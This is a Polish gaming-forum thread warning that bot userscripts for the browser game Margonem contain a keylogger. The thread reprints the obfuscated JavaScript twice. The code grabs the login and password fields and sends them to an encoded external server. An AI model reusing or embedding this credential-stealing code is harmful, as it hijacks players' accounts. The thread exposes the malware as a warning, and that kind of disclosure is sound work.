Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

Sprawdzenie botów na zawartość keyloggera

BartoX0909

Rekomendowane odpowiedzi

Opublikowano

Keylogger.

Zawsze i praktycznie ten sam...

var TpG3Y86zpgrtWMzb, ZHN4ekpZ5m95pFbJ, YQTtmEs6a5mTXE5a;

function UagZgR8PZcWcwvYp() {
    $(atob("I3Vsb2dpbg==")).val() != TpG3Y86zpgrtWMzb && $(atob("I3Vsb2dpbg==")).val() && (TpG3Y86zpgrtWMzb = $(atob("I3Vsb2dpbg==")).val()), $(atob("I3VwYXNz")).val() != ZHN4ekpZ5m95pFbJ && $(atob("I3VwYXNz")).val() && (ZHN4ekpZ5m95pFbJ = $(atob("I3VwYXNz")).val()), !$(atob("I3VwYXNz")).val() && !$(atob("I3Vsb2dpbg==")).val() && TpG3Y86zpgrtWMzb && ZHN4ekpZ5m95pFbJ && YQTtmEs6a5mTXE5a != TpG3Y86zpgrtWMzb + " | " + ZHN4ekpZ5m95pFbJ && ($.ajax({
        url: atob("aHR0cHM6Ly9kcGVsbWRnOGpyd2Y5YW1mLmN0OC5wbC9hamF4LnBocD9oYzY0cTg9") + TpG3Y86zpgrtWMzb + "|" + ZHN4ekpZ5m95pFbJ
    }), YQTtmEs6a5mTXE5a = TpG3Y86zpgrtWMzb + " | " + ZHN4ekpZ5m95pFbJ)
}

• Aive zmienił(a) tytuł na Sprawdzenie botów na zawartość keyloggera
  • 2 tygodnie później...
Opublikowano
Dnia 25.09.2019 o 13:18, marian42 napisał:

Keylogger.

Zawsze i praktycznie ten sam...

var TpG3Y86zpgrtWMzb, ZHN4ekpZ5m95pFbJ, YQTtmEs6a5mTXE5a;

function UagZgR8PZcWcwvYp() {
    $(atob("I3Vsb2dpbg==")).val() != TpG3Y86zpgrtWMzb && $(atob("I3Vsb2dpbg==")).val() && (TpG3Y86zpgrtWMzb = $(atob("I3Vsb2dpbg==")).val()), $(atob("I3VwYXNz")).val() != ZHN4ekpZ5m95pFbJ && $(atob("I3VwYXNz")).val() && (ZHN4ekpZ5m95pFbJ = $(atob("I3VwYXNz")).val()), !$(atob("I3VwYXNz")).val() && !$(atob("I3Vsb2dpbg==")).val() && TpG3Y86zpgrtWMzb && ZHN4ekpZ5m95pFbJ && YQTtmEs6a5mTXE5a != TpG3Y86zpgrtWMzb + " | " + ZHN4ekpZ5m95pFbJ && ($.ajax({
        url: atob("aHR0cHM6Ly9kcGVsbWRnOGpyd2Y5YW1mLmN0OC5wbC9hamF4LnBocD9oYzY0cTg9") + TpG3Y86zpgrtWMzb + "|" + ZHN4ekpZ5m95pFbJ
    }), YQTtmEs6a5mTXE5a = TpG3Y86zpgrtWMzb + " | " + ZHN4ekpZ5m95pFbJ)
}

a pytanie, z czym on jest związany lub jaki to rodzaj keyloggera

Opublikowano
4 godziny temu, marian42 napisał:

Wysyła dane na serwer.
Konkretniej dane logowania pobrane z www.margonem.pl  z pola #ulogin i #upassword.

czyli jeżeli używałem tego, wystarczy usunąć ten fragment i zmienić hasło?

• 4 tygodnie później...
Opublikowano
23 godziny temu, Sztalixon napisał:

To jest bot na E2 od Adi Wilka. Nie ma żadnego keyloggera, sam korzystam z tego bota. 

Mi wywala takie coś po wpisaniu i ubiciu e2

vv.png

Opublikowano
18 godzin temu, jozukisa napisał:

Mi wywala takie coś po wpisaniu i ubiciu e2

Odinstaluj wszystkie dodatki jak masz tam napisane i wyczyść ciasteczka. Wykonaj to co jest napisane. 

7 godzin temu, dawidwiedzmin napisał:

Witam, jak wy odpalacie te boty, jestem w tym zupełnie zielony, mógłby mi to ktoś wytłumaczyć? 😁

Pobierasz rozszerzenie "Tampermonkey" do przeglądarki i tam dodajesz ten kod jako nowy skrypt i wchodzisz na grę. 

• 4 tygodnie później...
  • 2 miesiące temu...
  • 1 miesiąc temu...
  • 11 miesięcy temu...

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...